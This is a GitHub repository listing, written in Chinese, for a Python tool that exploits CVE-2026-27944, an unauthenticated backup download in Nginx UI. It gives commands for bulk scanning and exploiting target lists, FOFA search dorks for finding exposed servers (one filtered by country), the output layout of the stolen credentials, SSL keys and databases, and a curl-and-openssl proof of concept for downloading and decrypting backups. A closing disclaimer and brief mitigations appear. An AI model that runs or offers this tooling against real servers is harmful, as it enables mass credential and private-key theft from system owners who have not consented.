BimaBalance/Cve-2026-27944-Tools-Exploit

GitHub: BimaBalance/Cve-2026-27944-Tools-Exploit

针对 Nginx UI 未授权备份漏洞(CVE-2026-27944)的 Python 漏洞利用工具,支持批量扫描、自动下载解密备份并提取凭据。

Stars: 1 | Forks: 0

🚀 CVE-2026-27944:Nginx UI 未授权备份漏洞利用 📌 描述 27944.py 是一个针对 CVE-2026-27944 的漏洞利用工具,允许攻击者在无需身份验证的情况下下载并解密 Nginx UI 的备份。 此漏洞存在于 < 2.3.2 版本的 Nginx UI 中,允许访问: · 用户凭据和 session token · SSL 私钥 · Nginx 配置 · 数据库文件 🔧 功能 · ✅ 从文件中进行批量扫描 · ✅ 单目标漏洞利用 · ✅ 自动下载备份 · ✅ 自动解密 AES-256-CBC · ✅ 从备份中自动提取凭据 🛠️ 安装方法 ``` git clone https://github.com/bimabalance/CVE-2026-27944.git cd CVE-2026-27944 pip install -r requirements.txt ``` 🚀 使用方法 1. 批量扫描 ``` python 27944.py -f targets.txt -o hasil_scan ``` 2. 单目标漏洞利用 ``` python 27944.py -t target.com:9000 --exploit --decrypt ``` 3. 完整漏洞利用 ``` python 27944.py -f targets.txt --exploit --decrypt -o hasil_full ``` 📋 目标格式 ``` target1.com:9000 192.168.1.1:9000 target2.com:8080 ``` 🎯 FOFA Dork ``` title="Nginx UI" icon_hash="-1565173320" header="X-Backup-Security" body="Nginx UI" && port="9000" title="Nginx UI" && country="ID" ``` 📂 输出结果 ``` results/ ├── results.json ├── target_backup.bin ├── target_backup_decrypted.zip └── target_extracted/ ├── app.ini ├── database.db ├── nginx.conf └── ssl/ ``` ⚠️ 免责声明 本工具出于教育和道德安全测试目的而开发。作者不对本工具的滥用承担责任。请仅在您拥有或获得书面授权进行测试的系统上使用。 📝 技术说明 CVE-2026-27944 是 Nginx UI 中的一个严重漏洞,允许攻击者无需身份验证即可访问 /api/backup endpoint。备份包含使用 AES-256 加密的敏感数据,但 key 和 IV 通过 X-Backup-Security header 以 Base64 格式发送。 CVSS Score: 9.8 (Critical) 受影响版本: Nginx UI < 2.3.2 缓解措施: 1. 升级至 Nginx UI v2.3.3 2. 禁止访问 /api/backup 3. 轮换所有凭据 💀 POC ``` # 检查 vulnerability curl -I http://target:9000/api/backup # 下载 backup curl -s http://target:9000/api/backup -o backup.bin # 解密 backup(手动) openssl enc -d -aes-256-cbc -base64 -K -iv -in backup.bin -out backup_decrypted.zip ```
标签:CVE-2026-27944, Python, StruQ, 安全测试工具, 无后门, 逆向工具